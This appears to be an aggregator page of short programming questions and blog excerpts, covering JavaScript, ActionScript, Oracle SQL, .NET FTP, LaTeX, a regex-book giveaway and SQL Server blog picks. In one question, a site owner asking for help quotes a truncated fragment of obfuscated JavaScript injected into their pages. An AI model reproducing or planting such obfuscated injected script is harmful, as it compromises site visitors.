  • Remove Duplicates from JavaScript Array

    - by kramden88
This seems like such a simple need but I've spent an inordinate amount of time trying to do this to no avail. I've looked at other questions on SO and I haven't found what I need. I have a very simple JavaScript array such as peoplenames = new Array("Mike","Matt","Nancy","Adam","Jenny","Nancy","Carl"); that may or may not contain duplicates and I need to simply remove the duplicates and put the unique values in a new array. That's it. I could point to all the codes that I've tried but I think it's useless because they don't work. If anyone has done this and can help me out I'd really appreciate it. JavaScript or jQuery solutions are both acceptable.

  • Caurina Tweener and Alpha

    - by Jk_
Hi guys, Usually I work with TweenLite but I had to modify the code of someone else who worked with Caurina Tweener. I have a basic problem with it! On my scene, I have a simple movie clip filled with black. Into this movieclip a bitmap file (jpg). When I make a tween on the alpha of my mc, it seems that there is a delay (in the alpha) between this the black background and the image. Tweener.addTween(thisMc, { _autoAlpha:0, time:1 } ); I'm sure there is an easy way to avoid this problem but I can't find it out! Cheers, Jk_

  • How to automate the finding of an M value along a route

    - by Heather Taylor
Kirk Kuykendall had given a script example a few years back in an ESRI forum http://forums.esri.com/Thread.asp?c=93&f=996&t=88246&mc=4 as to how to find the M (measure) value of a point in a shapefile along a route when you clicked on the point. This is very handy, BUT..I have 1500 points that I need M values for. Is there a way to automate this type of thing? I need the M values for the points to create linear events on the route. Note: I am not a programmer, but have people who can help me out.

  • How can I create masking like this in AS3?

    - by Ólafur Waage
I've worked a little bit with masks in AS3 but I'm not sure how I can do this with masks. I have two swf files that I have imported onto the Library as MC's with class names. One of the files is the start image and the other is the end image. The transition is a slide transition from the start image to the end image. You can think of the transition like in this example. But is it possible to do a slide transition like this using two swf's and "slide transitioning" between them?

  • How to write "good" user interface text?

    - by Roddy
Many applications are let down by the quality of the 'writing' in their user interfaces: typically, poor spelling, grammar, inconsistent tone, and worse yet, "humour" are the usual offenders. Are there good resources that can help developers to write UI messages that give a professional and positive impression to your customers, even when your code's going to hell in a handcart? Thanks, all — Some great resources here, so I will CW this question. I'm accepting Adam Sill's answer because it's the one that (as a developer of desktop apps) I found most pertinent.

  • Putting $$s in the middle of an `equation` environment: why doesn't Latex complain?

    - by Charles Stewart
I was surprised that the Latex code from a recent question didn't throw up any errors, and even more surprised on further investigation, that Crowley's explanation seems to be true. My intuition about the \begin{equation} ... \end{equation} code is clearly off, what's really going on? Consider this, slightly adapted code: \begin{equation} 1: e^{i\pi}+1=0 $$ 2: B\"ob $$ 3: e=mc^2 \end{equation} This seems to prove that Crowley's explanation of such code, namely that "What that code says to LaTeX is begin equation, end it, begin it again, typeset definition of tangens and end the equation" is right: lines 1&3 can only be typeset in maths mode, line 2 only in text mode. Shouldn't Latex see that the \end{equation} is ending a display math that wasn't started by the \begin{equation}?

  • How do I get the current location of an iframe?

    - by studiothat
I have built a basic data entry application allowing users to browse external content in iframe and enter data quickly from the same page. One of the data variables is the URL. Ideally I would like to be able to load the iframes current url into a textbox with javascript. I realize now that this is not going to happen due to security issues. Has anyone done anything on the server side? or know of any .Net browser in browser controls. The ultimate goal is to just give the user an easy method of extracting the url of the page they are viewing in the iframe It doesn't necessarily HAVE to be an iframe, a browser in the browser would be ideal. Thanks, Adam

  • Multi join query returns to many results and improperly matched

    - by Woot4Moo
I have the following minimal schema in Oracle: http://sqlfiddle.com/#!4/c1ed0/14 The queries I have run yield too many results and this query: select cat.*, status.*, source.* from cats cat, status status, source source Left OUTER JOIN source source2 on source2.sourceid = 1 Right OUTER JOIN status status2 on status2.isStray =0 order by cat.name will yield incorrect results. What I am expecting is a table that looks like the following however I cannot seem to come up with the correct SQL. NAME AGE LENGTH STATUSID CATSOURCE ISSTRAY SOURCEID CATID Adam 1 25 null null null 1 2 Bill 5 1 null null null null null Charles 7 5 null null null null null Steve 12 15 1 1 1 1 1 In plain English what I am looking for is to return all known cats + their associated cat source + their cat status while retaining null values. The only information I will have is the source that I am curious about. I also only want the cats that have a status of either STRAY or UNKNOWN (null)

  • Payment Gateways for Mid-Sized Business?

    - by Eric
My company is a bit unhappy with the support we've been getting from Cybersource and we're about to embark on a billing re-write so we're taking the opportunity to look at other gateways. Anyone have any positive or negative experiences they'd like to share? I'd rather not hear about small website gateways like paypal, we run tens of thousands of transactions and millions a year. If you know, I'd love to hear how much you're paying in transaction/gateway fees too. We're primarily a .NET shop if you'd like to speak to a particular API. Gateway must support the big 4 credit cards (mc, visa, disc, amex) and ACH. Thanks in advance for the help from the hive mind. :)

  • AS3: resizing as a result of an eventListener

    - by Jaimie
Hi everyone, I have coded a map that when a province object is clicked on, it should move to the center of the screen and grow a percentage of the width, along with displaying a number of different things. The problem is that in order for the image to resize it needs to be clicked on twice. It moves, and all of the children display just as they were designed to do, but the resize doesn't work on the first try. Any ideas how to fix this problem? ... menuItem4_mc.addEventListener(MouseEvent.CLICK, onClick); ... public function onClick(mc:MouseEvent):void { menuItem4_mc.width = width * .65; menuItem4_mc.height = height * .7; //brings Ontario To the front of the stage setChildIndex(menuItem4_mc,numChildren - 1); menuItem4_mc.x= 670/2; menuItem4_mc.y= 480/2; ... } Thank you!

  • Chunks of javascript added to webpages on server

    - by SteD
I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b" Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself? I am using Drupal + Ubercart with quite minimal forms inputs.

  • FtpWebResponse and StreamReader - specifying an offset

    - by AJ
Hi, I am using the FtpWebRequest / FtpWebResponse objects in C# to download files from a server - so far, so good. I create a StreamReader object from the response stream and use a StreamWriter to create a local file. Now, the file I am reading happens to be in a very simple 'archive' format - there is a small TOC at the start of the file followed by the actual file data. I can therefore read the TOC and get a file offset and size of the data I want to download. My question is: Supposing the offset is 1024. I would use StreamReader.Read(buffer, 1024, length), but will .NET and the FTP protocol actually allow me to skip bytes 0-1023, or does the reader still go through the (relatively) slow process of downloading and discarding the bytes I don't need? This may make the difference between whether I want to use a single archive file, or a TOC file with the data files stored separately. As a bit of a secondary question, would my mileage vary using the Http classes instead of Ftp? Cheers, Adam

  • AS3 function running before variables are defined!

    - by Jeffrey
I am trying to add an init() function to a MovieClip, but when I run the function from scene1 the variables that were set in the MovieClip are not defined yet... The MovieClip was dragged to the stage from the library. scene1: mc.init(null); MovieClip: var _default = 5; function init(num) { if(num == null) { trace(_default); } else { trace(num); } } This is tracing "undefined" instead of "5"; Is there a way of fixing this problem?

  • Check the cumulative status of onLoadInit in a for statement

    - by jonobr1
In a setup like this is it possible to check the cumulative status of all onLoadInit? for(var i:Number = 0; i < limit; i++) { var mcLoader:MovieClipLoader = new MovieClipLoader(); var mclListener:Object = new Object(); mclListener.onLoadInit = function(mc:MovieClip) { trace(i + " is finished loading!"); } mcLoader.addListener(mclListener); mcLoader.loadClip(some_image_path, someMovieClip); } Initially I was thinking that I could pass an array of Boolean's, but I'm not really sure where to add that checkpoint, because a flash frame doesn't keep looping. Would I have to add it to an onEnterFrame()?

  • How to retrieve large data from oracle database using vbscript

    - by allenzzzxd
Hi guys, I'm now working on vbscript to do some test. Actuelly, I want to retrieve a large amount of data from an oracle database, so I write the code like this: sql = "Select * from CORE_DB where MC = '" & mstr & "' " Set myrs = db_execute_query(curConnection, sql) Then I count the rows in myrs, there are 248 rows. So then I do a For loop to retrieve some fields of each row. For k = 0 To db_get_rows_count(myrs) But then I found that the content of the row k when k 133 was always equal to k = 133. So this makes an error. As I think, there may be a limit size of mrys ? Could anyone light me about this? Thanks a lot in advance

  • Can I use a string variable to reference a class variable?

    - by rson
Here's the scenario: I have an external swf file with x number of movieclips in its library that I load into a containing swf. Each MC in the external swf is linked with a class name and referenced on frame 1 as such var unique1:lineSequence1 = new lineSequence1(); the unique1 variable name will match a string variable I create in the containing swf: function initLines():void{ lineLoader = new Loader(); lineLoader.load(new URLRequest("theLines.swf")); //load external swf lineLoader.contentLoaderInfo.addEventListener(Event.COMPLETE, linesLoaded); } function linesLoaded(e:Event):void{ var loadedswf:MovieClip = e.target.content as MovieClip; var initialLines = projects[0].pageid; //projects is an xmllist trace("initialLines: "+initialLines); //returns "initialLines: unique1" lines_holder_mc.addChild(loadedswf.[initialLines]); } I would like to use the initialLines variable as the reference to unique1 instead of hardcoding unique1 into loadedswf.unique1 to reference said variable in the loaded swf.

  • Regular Expressions Cookbook Is in The Money—Win a Copy

    - by Jan Goyvaerts
%COOKBOOKFRAME%You may have heard some people say that most book authors never get any royalties. That’s not true because most authors get an advance royalty that is paid before the book is published. That’s the author’s main incentive for writing the book, at least as far as money is concerned. (If money is your main concern, don’t write books.) What is true is that most authors never see any money beyond the advance royalty. Royalty rates are very low. A 10% royalty of the publisher’s price is considered normal. The publisher’s price is usually 45% of the retail price. So if you pay full price in a bookstore, the author gets 4.5% of your money. If there’s more than one author, they split the royalty. It doesn’t take a math degree to figure out that a book needs to sell quite a few copies for the royalty to add up to a meaningful amount of money. But Steven and I must have done something right. Regular Expressions Cookbook is in the money. My royalty statement for the 3rd quartier of 2009, which is the 2nd quarter that the book was on the market, came with a check. I actually received it last month but didn’t get around to blogging about. The amount of the check is insignificant. The point is that the balance is no longer negative. I’m taking this opportunity to pat myself and my co-author on the back. To celebrate the occassion O’Reilly has offered to sponsor a give-away of five (5) copies of Regular Expressions Cookbook. These are the rules of the game: You must post a comment to this blog article including your actual name and actual email address. Names are published, email addresses are not. Comments are moderated by myself (Jan Goyvaerts). If I consider a comment to be offensive or spam it will not be published and not be eligible for any prize. If you don’t know what to say in the comment, just wish me a happy 100000nd birthday, so I don’t have to feel so bad about entering the 6-bit era. Each person commenting has only one chance to win, regardless of the number of comments posted. O’Reilly will be provided with the names and email addresses of the winners (and those email addresses only) in order to arrange delivery. Each winner can choose to receive a printed copy or ebook (DRM-free PDF). If you choose the printed book, O’Reilly pays for shipping to anywhere in the world but not for any duties or taxes your country may impose on books imported from the USA. If you choose the ebook, you’ll need to create an O’Reilly account that is then granted access to the PDF download. You can make your choice after you’ve won, so it doesn’t influence your chance of winning. Contest ends 28 February 2010, GMT+7 (Thai time). Chosen by five calls to Random(78)+1 in Delphi 2010, the winners are: 48: Xiaozu 45: David Chisholm 19: Miquel Burns 33: Aaron Rice 17: David Laing Thanks to everybody who participated. The winners have been notified by email on how to collect their prize.

  • Top 10 Linked Blogs of 2010

    - by Bill Graziano
Each week I send out a SQL Server newsletter and include links to interesting blog posts.  I’ve linked to over 500 blog posts so far in 2010.  Late last year I started storing those links in a database so I could do a little reporting.  I tend to link to posts related to the OLTP engine.  I also try to link to the individual blogger in the group blogs.  Unfortunately that wasn’t possible for the SQLCAT and CSS blogs.  I also have a real weakness for posts related to PASS. These are the top 10 blogs that I linked to during the year ordered by the number of posts I linked to. Paul Randal – Paul writes extensively on the internals of the relational engine.  Lots of great posts around transactions, transaction log, disaster recovery, corruption, indexes and DBCC.  I also linked to many of his SQL Server myths posts. Glenn Berry – Glenn writes very interesting posts on how hardware affects SQL Server.  I especially like his posts on the various CPU platforms.  These aren’t necessarily topics that I’m searching for but I really enjoy reading them. The SQLCAT Team – This Microsoft team focuses on the largest and most interesting SQL Server installations.  The regularly publish white papers and best practices. SQL Server CSS Team – These are the top engineers from the Microsoft Customer Service and Support group.  These are the folks you finally talk to after your case has been escalated about 20 times.  They write about the interesting problems they find. Brent Ozar – The posts I linked to mostly focused on the relational engine: CPU, NUMA, SSD drives, performance monitoring, etc.  But Brent writes about a real variety of topics including blogging, social networking, speaking, the MCM, SQL Azure and anything else that seems to strike his fancy.  His posts are always well written and though provoking. Jeremiah Peschka – A number of Jeremiah’s posts weren’t about SQL Server.  He’s very active in the “NoSQL” area and I linked to a number of those posts.  I think it’s important for people to know what other technologies are out there. Brad McGehee – Brad writes about being a DBA including maintenance plans, DBA checklists, compression and audit. Thomas LaRock – I linked to a variety of posts from PBM to networking to 24 Hours of PASS to TDE.  Just a real variety of topics.  Tom always writes with an interesting style usually mixing in a movie theme and/or bacon. Aaron Bertrand – Many of my links this year were Denali features.  He also had a great series on bad habits to kick. Michael J. Swart – This last one surprised me.  There are some well known SQL Server bloggers below Michael on this list.  I linked to posts on indexes, hierarchies, transactions and I/O performance and a variety of other engine related posts.  All are interesting and well thought out.  Many of his non-SQL posts are also very good.  He seems to have an interest in puzzles and other brain teasers.  Michael, I won’t be surprised again!
